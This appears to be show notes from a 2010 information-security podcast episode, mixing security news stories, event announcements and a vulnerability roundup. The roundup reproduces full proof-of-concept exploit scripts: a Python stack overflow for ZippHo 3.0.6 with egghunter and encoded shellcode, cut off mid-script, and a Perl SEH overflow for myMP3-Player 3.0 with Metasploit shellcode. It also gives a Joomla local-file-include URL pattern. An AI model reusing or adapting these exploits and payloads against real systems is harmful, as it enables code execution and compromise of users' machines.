The technology in question is a system called Webtech Plus. Operated by Cleveland-based Pay Technologies, car dealers install a small black box under dashboards that responds to remote commands relayed over wireless pager network. While the system will not stop a vehicle that’s being driven, it can disable a car’s ignition system, or trigger the horn.

Texas Auto Center began receiving complaints in the last week of February. After Texas Auto Center reset its Webtech Plus passwords for all its employee accounts (5 days later), problems stopped. It turns out that Ramos-Lopez had (somehow) acquired another employees password to the system (his was obviously deactivated when he was terminated).

Texas Auto Center manager Martin Garcia said that Ramos-Lopez was good with computers. Apparently, he wasn’t all that knowledgeable, however, as it was easy, once police obtained access logs from Pay Technologies, to trace his IP address down.

According to Jim Krueger, co-owner of Pay Technologies, this is the first such incident is the company is aware of. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.”

News item 5:  http://www.securityfocus.com/news/11582
SecurityFocus has begun a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.

InfoSec Daily Podcast

 
ISD Podcast Episode 90 for March 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.  Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego, CA – May 10th-14th
  • San Francisco, CA – June 14th -18th
  • Atlanta. GA – July – 12th-16th
  • Chicago, IL – September – 13th – 17th
  • Dallas, Tx – October – 11th – 15th
  • Washington DC – December 6th – 10th

OuterZ0ne:

• Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
• Starts early Saturday morning at the Wellseley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
• The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. The Bible Study component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Bible Study 6.1 is affected; other versions may be vulnerable as well. The following example URL is available: http://www.sample.com/index.php?option=com_biblestudy&amp;id=1&amp;view=studieslist&amp;controller= [-LFI-]
   2. ZippHo is subject to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. ZippHo 3.0.6 is vulnerable; other versions may also be affected.  Proof of concept is available:
      #!/usr/bin/python
      # #######################################################################
      # ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit
      # Author: mr_me – http://net-ninja.net/ & http://twitter.com/StevenSeeley
      # Download: http://www.brothersoft.com/zippho-71295.html
      # Platform: Windows XP sp3 En
      # Greetz to: Corelan Security Team & fl0 fl0w
      # http://www.corelan.be:8800/index.php/security/corelan-team-members/
      # #######################################################################
      # Script provided ‘as is’, without any warranty.
      # Use for educational purposes only.
      # Do not use this code to do anything illegal !
      #
      # Note : you are not allowed to edit/modify this code.
      # If you do, Corelan cannot be held responsible for any damages this may cause.
      print “|——————————————————————|”
      print “| __ __ |”
      print “| _________ ________ / /___ _____ / /____ ____ _____ ___ |”
      print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |”
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |”
      print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |”
      print “| |”
      print “| http://www.corelan.be:8800 |”
      print “| security@corelan.be |”
      print “| |”
      print “|————————————————-[ EIP Hunters ]–|”
      print “[+] ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit”

      # local file header
      lf_header = (“\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″
      “\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00″)

      # central directory file header
      cdf_header = (“\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″
      “\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00″
      “\x24\x00\x00\x00\x00\x00\x00\x00″)

      # end of central directory record
      efcdr_record = (“\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00″
      “\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00″)

      # asci egghunter
      egghunter= (“JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1″
      “9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA”)

      # encoded calc
      calc = (“\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49″
      “\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41″
      “\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42″
      “\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b”
      “\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55″
      “\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c”
      “\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b”
      “\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49″
      “\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51″
      “\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50″
      “\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34″
      “\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51″
      “\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31″
      “\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50″
      “\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30″
      “\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c”
      “\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a”
      “\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a”
      “\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43″
      “\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45″
      “\x50\x41\x41″)

      # custom decoder
      decoder = (“\x25\x4A\x4D\x4E\x55″
      “\x25\x35\x32\x31\x2A\x2d\x55\x55″
      “\x55\x5f\x2d\x56\x55\x56\x5f\x2d”
      “\x55\x55\x55\x5e\x50\x25\x4A\x4D”
      “\x4E\x55\x25\x35\x32\x31\x2A\x2d”
      “\x2b\x6a\x32\x53\x2d\x2a\x6a\x31″
      “\x54\x2d\x2a\x69\x31\x54\x50″)

      # attack string
      exploit = “\x43″ * 10
      exploit += egghunter
      exploit += “\x41″ * (221-len(exploit))
      exploit += “\x61″
      exploit += “\x53″
      exploit += “\x5c”
      exploit += decoder
      exploit += “\x41″ * (292-len(exploit))
      exploit += “\x73\xf9\x41\x41″
      exploit += “\x70\x54\x54\x00″
      exploit += “\x57\x30\x30\x54″
      exploit += “\x57\x30\x30\x54″
      # I have no eyes, I make the flash of lightning my eyes ~ samurai creed.
      exploit += calc
      exploit += “\x41″ * (4064-len(exploit))
      exploit += “\x2e\x74\x78\x74″
      print “[+] Writing attack string to file..”
      mefile =

   3. myMP3-Player is subject to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. myMP3-Player 3.0 is vulnerable; other versions may also be affected.  Exploit code is available:
      #!/usr/bin/perl

      # Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
      # Date: 18.03.2010
      # Author: n3w7u
      # Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
      # Version: 3.0 and the other version can’t be download from serious Page, and don’t be free.
      # Tested on: Windows XP SP3 (ger)

      #[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]

      my $file= “evil.m3u”;
      my $junk =”\x41″ x 1040; # for myMp3 Player 5/cracked junk =1056
      my $jmp=”\xEB\x08\x90\x90″; # jmp short
      my $seh=”\x25\x12\xC8\x72″; #72 C8 12 25 msacm32.drv
      my $nop =”\x90″ x 20;
      my $nops =”\x90″ x 10;

      # windows/exec – 224 bytes
      # http://www.metasploit.com
      # Encoder: x86/call4_dword_xor
      # EXITFUNC=process, CMD=calc.exe
      my $buf =
      “\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76″ .
      “\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce” .
      “\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62″ .
      “\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e” .
      “\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e” .
      “\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b” .
      “\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd” .
      “\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f” .
      “\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a” .
      “\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96″ .
      “\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35″ .
      “\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93″ .
      “\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9″ .
      “\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b” .
      “\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01″ .
      “\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce”;

      open($File,”>$file”);
      print $File $junk.$jmp.$seh.$nop.$buf.$nops;
      close($File);

   4. ManageEngine ServiceDesk Plus is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The issue affects ManageEngine ServiceDesk Plus 7.6.0; other versions may also be affected. All it takes is a browser to exploit this issue.

Stories of Interest:
News item 1:  http://www.theregister.co.uk/2010/03/15/facebook_profile_stalk_scam/
A bogus application that lures Facebook users by falsely offering to show who has been viewing their profile has been exposed as a scam. A researcher warns he has already identified 25 different copies of the same rogue app but using different monikers such as peeppeep-pro, profile-check-online and stalk-my-profile.

All of the rogue apps are spread by updates seeking to lure the friends of previous victims to give the stalkerware a try. Some even offer a photo montage of a victim’s contacts in a bid to add more authenticity. However, none of the apps actually do anything except profit their creators via ad affiliate revenues and deceptive tactics.

“The app itself is designed to look convincing enough, but none of the many ‘Continue’ buttons it offers will activate some under-the-counter profile checking functionality – they will just push you into another Facebook app earning the scammer advertising revenue in the process,” Ferguson explains in a blog post containing screenshots illustrating the scam, which resurfaced over the weekend.

News item 2: http://go.microsoft.com/?linkid=9722922

Microsoft has released a workaround for a zero-day vulnerability in older versions of Internet Explorer. The senior security communications manager at Microsoft said that a workaround on security advisory 981374 has been released to cover the remote code execution vulnerability. Microsoft has confirmed that Internet Explorer 8 and Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 are not affected, but that Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6 and Internet Explorer 7 are vulnerable. The manager also confirmed that exploit code has been made public for this issue.

To apply the “Disable peer factory in iepeers.dll” automatically to supported versions of Windows XP and Windows Server 2003, click the Fix it button or link. Click Run in the File Download  dialog box, and then follow the steps in the Fix it wizard.

To undo the fix and restore the original settings, click the Fix this problem link under the “Disable this fix” heading. Then, click Run in the File Download dialog box and follow the steps in the wizard.

News item 3: http://www.pcmag.com/article2/0,2817,2361525,00.asp

Hackers have flooded the Internet with virus-tainted spam that targets Facebook’s estimated 400 million users in an effort to steal banking passwords and gather other sensitive information.

The emails tell recipients that the passwords on their Facebook accounts have been reset, urging them to click on an attachment to obtain new login credentials, according to anti-virus software maker McAfee Inc.

If the attachment is opened, it downloads several types of malicious software, including a program that steals passwords, McAfee said on Wednesday.

Hackers have long targeted Facebook users, sending them tainted messages via the social networking company’s own internal email system. With this new attack, they are using regular Internet email to spread their malicious software.

News item 4: http://www.darkreading.com/security/management/showArticle.jhtml?articleID=223800256

Most security professionals who officially map out their career plans make higher salaries than those who don’t. Around 60 percent of those who have written career plans earn more than $100,000 a year, while about 45 percent of those without career plans land in that salary bracket, according to just-released data from a comprehensive voluntary survey taken of security pros from late 2008 through 2009.

The survey found that security pros with a career plan are 33 percent more likely to earn more than $100,000, and 46 percent are more likely to earn more than $120,000.

The Information Security Career Survey, which was conducted by InfoSecLeaders.com to provide an inside look at what security professionals are doing and thinking about their careers, encompasses responses from around 940 IT security people, two-thirds of whom are engineers, team leaders, and security architects from all sizes of organizations.
Iron Geek Technical Segement:
http://www.irongeek.com/i.php?page=security/hacker-con-handout